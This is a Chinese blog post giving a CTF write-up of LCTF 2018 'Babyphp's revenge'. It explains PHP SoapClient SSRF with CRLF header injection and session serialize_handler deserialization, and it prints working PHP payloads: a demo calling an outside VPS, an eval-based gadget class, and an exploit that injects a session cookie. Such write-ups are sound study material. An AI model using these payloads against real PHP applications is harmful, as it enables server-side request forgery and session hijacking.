<!DOCTYPE html>












  


<html class="theme-next pisces use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">






  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-center-circle.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon1.ico?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon1.ico?v=6.3.0">


  <link rel="mask-icon" href="/images/favicon1.ico?v=6.3.0" color="#222">









<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Pisces',
    version: '6.3.0',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="继续填坑..">
<meta name="keywords" content="CTF">
<meta property="og:type" content="article">
<meta property="og:title" content="LCTF 2018 Babyphp&#39;s revenge">
<meta property="og:url" content="http://passer6y.fun/2019/02/10/LCTF 2018 Babyphp's revenge/index.html">
<meta property="og:site_name" content="Passerby&#39;s Blog">
<meta property="og:description" content="继续填坑..">
<meta property="og:locale" content="zh-Hans">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/bfu9tthia4k90bvlfyakpwoa/image_1d368hpc812j6vgt12nnomj15ai9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/jbrdrf23eic87pmw0eku7qqx/image_1d368p2le1ftg1u711senfq88rp16.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/v2m6b0hriotdazaput1p459y/image_1d36apbldfe5t6k10k3j6skjg1j.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/xuxs1zvq8enjdrecy8yu8iip/image_1d36c2pvtjn21por2trqvf1ffb20.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/1ha4j8ki4elb8kqtn1ogn6g2/image_1d36c8d6mg6tsiq1k431k1d1uli2d.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/akjnfrhidbltnedbt1uh8yr5/image_1d36m8qmuoi6pft6tvgh1tug9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/j0ultsskxqj45scoto9i9fr8/image_1d36mb5vv9t5ctchmgmsn1e2tm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/d535hyg4qv14nchcydmlyo4h/image_1d36md4p9npvjcs6psc92s0q1j.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/q8a8klv10qiu0zstoqowi9yf/image_1d36mdtlq1d2t9bgbhdbt25lu20.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/e7iqr1clgbmg82kqc7u8ryks/image_1d36r14f3m311ha2b8p1crh37m2d.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/gjwxa7owf1zl1cku68yjc94v/image_1d36r4uf8c0718nj1igd1kmn1o352q.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/tmhm44j9p6xrzqwe5pjn9trz/image_1d36sp0n7ktotav1hi8pqtbo3k.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/tv8xayjymacm395sjeurapjz/image_1d391q74slqa1gbp15jecnc14ma9.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/7dr647kzvcpu6lq8ed84dce3/image_1d3928hpt1uav102t87v2n31i4tm.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/hgggcquf896j63z2byrijoc7/image_1d39g8666dtm1sgh1voe1t89j3n1t.png">
<meta property="og:image" content="http://static.zybuluo.com/Passer6y/v3t4jjyvhwwh6eidi5ozw683/image_1d39g291h1i0s3jb1ao71cb614qe1g.png">
<meta property="og:updated_time" content="2019-02-09T16:12:26.461Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="LCTF 2018 Babyphp&#39;s revenge">
<meta name="twitter:description" content="继续填坑..">
<meta name="twitter:image" content="http://static.zybuluo.com/Passer6y/bfu9tthia4k90bvlfyakpwoa/image_1d368hpc812j6vgt12nnomj15ai9.png">



  <link rel="alternate" href="/atom.xml" title="Passerby's Blog" type="application/atom+xml" />




  <link rel="canonical" href="http://passer6y.fun/2019/02/10/LCTF 2018 Babyphp's revenge/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>LCTF 2018 Babyphp's revenge | Passerby's Blog</title>
  






  <script type="text/javascript">
    var _hmt = _hmt || [];
    (function() {
      var hm = document.createElement("script");
      hm.src = "https://hm.baidu.com/hm.js?14e9c0326e763de8b0a61711cc963a58";
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(hm, s);
    })();
  </script>




  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Passerby's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />首页</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-ctf">
    <a href="/categories/CTF/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-flag"></i> <br />CTF</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-web">
    <a href="/categories/Web/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-jsfiddle"></i> <br />Web</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-code">
    <a href="/categories/Code/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-code"></i> <br />Code</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-internet">
    <a href="/categories/Internet/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-wifi"></i> <br />内网渗透</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-others">
    <a href="/categories/Others/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-eye"></i> <br />Others</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-folder-open"></i> <br />归档</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />标签</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/About/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />关于</a>
  </li>

      
      
        <li class="menu-item menu-item-search">
          
            <a href="javascript:;" class="popup-trigger">
          
            
              <i class="menu-item-icon fa fa-search fa-fw"></i> <br />Suche</a>
        </li>
      
    </ul>
  

  

  
    <div class="site-search">
      
  
  <div class="algolia-popup popup search-popup">
    <div class="algolia-search">
      <div class="algolia-search-input-icon">
        <i class="fa fa-search"></i>
      </div>
      <div class="algolia-search-input" id="algolia-search-input"></div>
    </div>

    <div class="algolia-results">
      <div id="algolia-stats"></div>
      <div id="algolia-hits"></div>
      <div id="algolia-pagination" class="algolia-pagination"></div>
    </div>

    <span class="popup-btn-close">
      <i class="fa fa-times-circle"></i>
    </span>
  </div>




    </div>
  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://passer6y.fun/2019/02/10/LCTF 2018 Babyphp's revenge/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Passer6y">
      <meta itemprop="description" content="A salty fish">
      <meta itemprop="image" content="/images/21.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Passerby's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">LCTF 2018 Babyphp's revenge
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Veröffentlicht am</span>
              

              
                
              

              <time title="Post created: 2019-02-10 00:10:00 / Updated at: 00:12:26" itemprop="dateCreated datePublished" datetime="2019-02-10T00:10:00+08:00">2019-02-10</time>
            

            
              

              
            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">in</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing"><a href="/categories/CTF/" itemprop="url" rel="index"><span itemprop="name">CTF</span></a></span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2019/02/10/LCTF 2018 Babyphp's revenge/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2019/02/10/LCTF 2018 Babyphp's revenge/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2019/02/10/LCTF 2018 Babyphp's revenge/" class="leancloud_visitors" data-flag-title="LCTF 2018 Babyphp's revenge">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Views: </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>继续填坑..<br><a id="more"></a></p>
<h2 id="Babyphp’s-revenge"><a href="#Babyphp’s-revenge" class="headerlink" title="Babyphp’s revenge"></a>Babyphp’s revenge</h2><p>考点：session反序列化+soap+ssrf</p>
<h3 id="一：-soap-ssrf"><a href="#一：-soap-ssrf" class="headerlink" title="一： soap ssrf"></a>一： soap ssrf</h3><ol>
<li><p>soap服务是什么？<br><img src="http://static.zybuluo.com/Passer6y/bfu9tthia4k90bvlfyakpwoa/image_1d368hpc812j6vgt12nnomj15ai9.png" alt="image_1d368hpc812j6vgt12nnomj15ai9.png-18.2kB"><br>简单而言即一种通信方式</p>
</li>
<li><p>特征<br>在phpinfo中可以看到<br><img src="http://static.zybuluo.com/Passer6y/jbrdrf23eic87pmw0eku7qqx/image_1d368p2le1ftg1u711senfq88rp16.png" alt="image_1d368p2le1ftg1u711senfq88rp16.png-74.5kB"></p>
</li>
<li><p>利用条件<br>有可控的点去反序列化调用soapclient类进行SSRF</p>
</li>
</ol>
<p>那么为什么要选择使用soapclient这个类呢？</p>
<ul>
<li>如果开启了soap服务，soapclient类就是php的内置类</li>
<li>从php文档中可以看到，其第一个参数为$Url，这就为之后的ssrf作为铺垫<br><img src="http://static.zybuluo.com/Passer6y/v2m6b0hriotdazaput1p459y/image_1d36apbldfe5t6k10k3j6skjg1j.png" alt="image_1d36apbldfe5t6k10k3j6skjg1j.png-12kB"></li>
<li>其次当数据被反序列化后，其对象还要调用一个不存在的类，以调用soapclient的__call方法</li>
</ul>
<blockquote>
<p>同时该类__call方法还有crlf注入漏洞，具体分析见：<a href="https://xz.aliyun.com/t/2148" target="_blank" rel="noopener">https://xz.aliyun.com/t/2148</a></p>
</blockquote>
<p>如何触发ssrf呢？<br>参考： </p>
<ul>
<li><a href="https://xz.aliyun.com/t/2148#toc-0" target="_blank" rel="noopener">https://xz.aliyun.com/t/2148#toc-0</a></li>
<li><a href="http://php.net/manual/zh/soapclient.soapclient.php" target="_blank" rel="noopener">http://php.net/manual/zh/soapclient.soapclient.php</a></li>
</ul>
<p>该类实例化的时候有两个参数：<br><img src="http://static.zybuluo.com/Passer6y/xuxs1zvq8enjdrecy8yu8iip/image_1d36c2pvtjn21por2trqvf1ffb20.png" alt="image_1d36c2pvtjn21por2trqvf1ffb20.png-35.3kB"><br>第一个参数控制是否为WSDL模式。如果为NULL，就是non-WSDL模式。<br>如果是非wsdl模式，反序列化的时候就会对options中的url进行远程soap请求。<br><img src="http://static.zybuluo.com/Passer6y/1ha4j8ki4elb8kqtn1ogn6g2/image_1d36c8d6mg6tsiq1k431k1d1uli2d.png" alt="image_1d36c8d6mg6tsiq1k431k1d1uli2d.png-106.3kB"><br>如果是wsdl模式，在序列化之前就会对$url参数进行请求，从而无法可控序列化数据。</p>
<p>本地复现：<br><img src="http://static.zybuluo.com/Passer6y/akjnfrhidbltnedbt1uh8yr5/image_1d36m8qmuoi6pft6tvgh1tug9.png" alt="image_1d36m8qmuoi6pft6tvgh1tug9.png-62.9kB"><br>代码：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$location = &apos;http://155.94.177.154:6666/&apos;;</span><br><span class="line">$a = new SoapClient(null, array(&apos;location&apos; =&gt; $location ,&apos;uri&apos;  =&gt; &apos;123&apos;));</span><br><span class="line">$auth=  unserialize(serialize($a));</span><br><span class="line">$auth-&gt;aa();</span><br><span class="line">echo &quot;1&quot;;</span><br></pre></td></tr></table></figure></p>
<p>另一台vps上开启监听：<br><img src="http://static.zybuluo.com/Passer6y/j0ultsskxqj45scoto9i9fr8/image_1d36mb5vv9t5ctchmgmsn1e2tm.png" alt="image_1d36mb5vv9t5ctchmgmsn1e2tm.png-11.2kB"></p>
<p>执行：<br><img src="http://static.zybuluo.com/Passer6y/d535hyg4qv14nchcydmlyo4h/image_1d36md4p9npvjcs6psc92s0q1j.png" alt="image_1d36md4p9npvjcs6psc92s0q1j.png-13.2kB"></p>
<p>vps监听到：<br><img src="http://static.zybuluo.com/Passer6y/q8a8klv10qiu0zstoqowi9yf/image_1d36mdtlq1d2t9bgbhdbt25lu20.png" alt="image_1d36mdtlq1d2t9bgbhdbt25lu20.png-140.9kB"></p>
<p>可以看到在soap库发送的xml数据在数据包的post处，所以这个的局限在于一般只能打get形的ssrf。</p>
<h3 id="二：php-session反序列化"><a href="#二：php-session反序列化" class="headerlink" title="二：php session反序列化"></a>二：php session反序列化</h3><p>其核心原理在于php在存储序列化$_SESSION数据引擎和反序列化该数据的引擎不一样导致。</p>
<p>利用条件：</p>
<ul>
<li><p>在同一网站能同时出现两种不同的session配置方式：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">session.serialize_handler=php_serialize|php</span><br></pre></td></tr></table></figure>
</li>
<li><p>$_SESSION值可控</p>
</li>
</ul>
<p>满足以上几点即等价于我们对unserialize()的参数可控。</p>
<p>php.ini中的配置：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">session.save_path=&quot;D:\xampp\tmp&quot;	表明所有的session文件都是存储在xampp/tmp下</span><br><span class="line">session.save_handler=files		  	表明session是以文件的方式来进行存储的</span><br><span class="line">session.auto_start=0				表明默认不启动session</span><br><span class="line">session.serialize_handler=php --定义用来序列化/反序列化的处理器名字。默认使用php</span><br></pre></td></tr></table></figure></p>
<p>session.serialize_handler的其他几种配置项：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">php_binary:存储方式是，键名的长度对应的ASCII字符+键名+经过serialize()函数序列化处理的值</span><br><span class="line">php:存储方式是，键名+竖线+经过serialize()函数序列处理的值</span><br><span class="line">php_serialize(php&gt;5.5.4):存储方式是，经过serialize()函数序列化处理的值</span><br></pre></td></tr></table></figure></p>
<p>使用<code>session.serialize_handler=php_serialize</code>：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);</span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&quot;name&quot;] = &quot;PASSER6Y&quot;;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/e7iqr1clgbmg82kqc7u8ryks/image_1d36r14f3m311ha2b8p1crh37m2d.png" alt="image_1d36r14f3m311ha2b8p1crh37m2d.png-83.1kB"><br>该方式在序列化数据前加了a:1:</p>
<p>而使用默认配置时(<code>session.serialize_handler=php</code>)：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">//ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);</span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&quot;name&quot;] = &quot;PASSER6Y&quot;;</span><br></pre></td></tr></table></figure></p>
<p><img src="http://static.zybuluo.com/Passer6y/gjwxa7owf1zl1cku68yjc94v/image_1d36r4uf8c0718nj1igd1kmn1o352q.png" alt="image_1d36r4uf8c0718nj1igd1kmn1o352q.png-155.7kB"><br>php引擎将竖线(|)将其分割成两部分，前面为键名，后面为序列化数据</p>
<p>两者的差异在于用php方式时以<code>|</code>分割，如果我们在<code>php_serialize</code>存入的数据带有<code>|</code>，而取出数据时使用php引擎，则会导致序列化数据在经过php引擎时被反序列化引发安全问题。</p>
<p>漏洞复现demo：<br>1.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php_serialize&apos;);</span><br><span class="line">session_start();</span><br><span class="line">$_SESSION[&quot;passer6y&quot;]=$_GET[&quot;a&quot;];</span><br></pre></td></tr></table></figure></p>
<p>2.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php&apos;);</span><br><span class="line">session_start();</span><br><span class="line">class aa &#123;</span><br><span class="line">    var $hi;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;hi = &apos;phpinfo();&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">         eval($this-&gt;hi);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>构造payload：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">ini_set(&apos;session.serialize_handler&apos;, &apos;php&apos;);</span><br><span class="line">session_start();</span><br><span class="line">class aa &#123;</span><br><span class="line">    var $hi;</span><br><span class="line">    function __construct()&#123;</span><br><span class="line">        $this-&gt;hi = &apos;phpinfo();&apos;;</span><br><span class="line">    &#125;</span><br><span class="line">    </span><br><span class="line">    function __destruct() &#123;</span><br><span class="line">         eval($this-&gt;hi);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a = new aa();</span><br><span class="line"></span><br><span class="line">echo serialize($a);     //O:2:&quot;aa&quot;:1:&#123;s:2:&quot;hi&quot;;s:10:&quot;phpinfo();&quot;;&#125;</span><br><span class="line">echo &quot;\n\n&quot;;</span><br><span class="line">echo urlencode(serialize($a));</span><br></pre></td></tr></table></figure></p>
<p>payload: <code>http://ip/?a=|O:2:%22aa%22:1:{s:2:%22hi%22;s:10:%22phpinfo();%22;}</code></p>
<p>然后访问：2.php<br><img src="http://static.zybuluo.com/Passer6y/tmhm44j9p6xrzqwe5pjn9trz/image_1d36sp0n7ktotav1hi8pqtbo3k.png" alt="image_1d36sp0n7ktotav1hi8pqtbo3k.png-52.2kB"></p>
<h3 id="最后"><a href="#最后" class="headerlink" title="最后"></a>最后</h3><p>回到题目来看，分析一下题目逻辑；<br>index.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line">$b = &apos;implode&apos;;</span><br><span class="line">call_user_func($_GET[&apos;f&apos;],$_POST);</span><br><span class="line">session_start();</span><br><span class="line">if(isset($_GET[&apos;name&apos;]))&#123;</span><br><span class="line">    $_SESSION[&apos;name&apos;] = $_GET[&apos;name&apos;];</span><br><span class="line">&#125;</span><br><span class="line">var_dump($_SESSION);</span><br><span class="line">$a = array(reset($_SESSION),&apos;welcome_to_the_lctf2018&apos;);</span><br><span class="line">call_user_func($b,$a);</span><br></pre></td></tr></table></figure></p>
<p>flag.php<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">session_start();</span><br><span class="line">echo &apos;only localhost can get flag!&apos;;</span><br><span class="line">$flag = &apos;LCTF&#123;******************&#125;&apos;;</span><br><span class="line">if($_SERVER[&quot;REMOTE_ADDR&quot;]===&quot;127.0.0.1&quot;)&#123;</span><br><span class="line">$_SESSION[&apos;flag&apos;] = $flag;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>第一个<code>call_user_func()</code>函数可以帮助我们将php的session处理方式设置为<code>php_serialize</code>，这里可以使用<code>session_start()</code>来开启，他支持一个数组参数：<br><img src="http://static.zybuluo.com/Passer6y/tv8xayjymacm395sjeurapjz/image_1d391q74slqa1gbp15jecnc14ma9.png" alt="image_1d391q74slqa1gbp15jecnc14ma9.png-13.4kB"></p>
<p>所以这一步我们将<code>$_GET[&#39;f&#39;]=session_start</code>,然后post数据：<code>serialize_handler=php_serialize</code></p>
<p>再往下<code>$_GET[&#39;name&#39;]</code>，这使得我们可以控制session，所以这一步传入我们的soup的ssrf反序列化数据。</p>
<p>从flag.php中可知，flag是存储在我们的session中的(成功触发后，<code>var_dump($_SESSION);</code>会显示出我们的flag)，所以我们ssrf的时候要带上session，这里会用到soup ssrf的crlf漏洞。</p>
<p>当然在这里，soup ssrf 还需要一步，就是调用其类中的<code>__call</code>方法，这里参考文档：<br><img src="http://static.zybuluo.com/Passer6y/7dr647kzvcpu6lq8ed84dce3/image_1d3928hpt1uav102t87v2n31i4tm.png" alt="image_1d3928hpt1uav102t87v2n31i4tm.png-15.1kB"></p>
<p>所以我们将精心构造的session数据存入后，第二次访问，利用变量覆盖将<code>$b</code>变成<code>call_user_func</code>，然后就能调用一个不存在的方法(<code>welcome_to_the_lctf2018</code>),从而触发<code>__call</code>方法，形成ssrf。</p>
<p>不知道环境问题还是啥调了很久，在第一步修改session_handle的类型时修改失败了，导致后面无法触发ssrf。复现的时候没有官方docker，调了很久还是不是很明白…</p>
<p><img src="http://static.zybuluo.com/Passer6y/hgggcquf896j63z2byrijoc7/image_1d39g8666dtm1sgh1voe1t89j3n1t.png" alt="image_1d39g8666dtm1sgh1voe1t89j3n1t.png-95.3kB"></p>
<p>嫖的exp：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">$target=&apos;http://127.0.0.1/flag.php&apos;;</span><br><span class="line">$b = new SoapClient(null,array(&apos;location&apos; =&gt; $target,</span><br><span class="line">                               &apos;user_agent&apos; =&gt; &quot;AAA:BBB\r\n&quot; .</span><br><span class="line">                                             &quot;Cookie:PHPSESSID=dde63k4h9t7c9dfl79np27e912&quot;,</span><br><span class="line">                               &apos;uri&apos; =&gt; &quot;http://127.0.0.1/&quot;));</span><br><span class="line"></span><br><span class="line">$se = serialize($b); </span><br><span class="line">echo urlencode($se);</span><br></pre></td></tr></table></figure></p>
<p>第二步：<br><img src="http://static.zybuluo.com/Passer6y/v3t4jjyvhwwh6eidi5ozw683/image_1d39g291h1i0s3jb1ao71cb614qe1g.png" alt="image_1d39g291h1i0s3jb1ao71cb614qe1g.png-44.1kB"></p>

      
    </div>

    

    
    
    

	
    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>Post author:  </strong>Passer6y</li>
  <li class="post-copyright-link">
    <strong>Post link: </strong>
    <a href="http://passer6y.fun/2019/02/10/LCTF 2018 Babyphp's revenge/" title="LCTF 2018 Babyphp's revenge">http://passer6y.fun/2019/02/10/LCTF 2018 Babyphp's revenge/</a>
  </li>
  <li class="post-copyright-license">
    <strong>Copyright Notice:  </strong>true</li>
</ul>

      </div>
    

    <footer class="post-footer">
      
        <div class="post-tags">
          
            <a href="/tags/CTF/" rel="tag"><i class="fa fa-tag"></i> CTF</a>
          
        </div>
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2019/02/09/按键精灵学习记录/" rel="next" title="按键精灵学习记录">
                <i class="fa fa-chevron-left"></i> 按键精灵学习记录
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          

  
    <div class="comments" id="comments">
    </div>
  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Inhaltsverzeichnis
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Übersicht
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/21.jpg"
                alt="Passer6y" />
            
              <p class="site-author-name" itemprop="name">Passer6y</p>
              <p class="site-description motion-element" itemprop="description">A salty fish</p>
          </div>

          
            <nav class="site-state motion-element">
              
                <div class="site-state-item site-state-posts">
                
                  <a href="/archives">
                
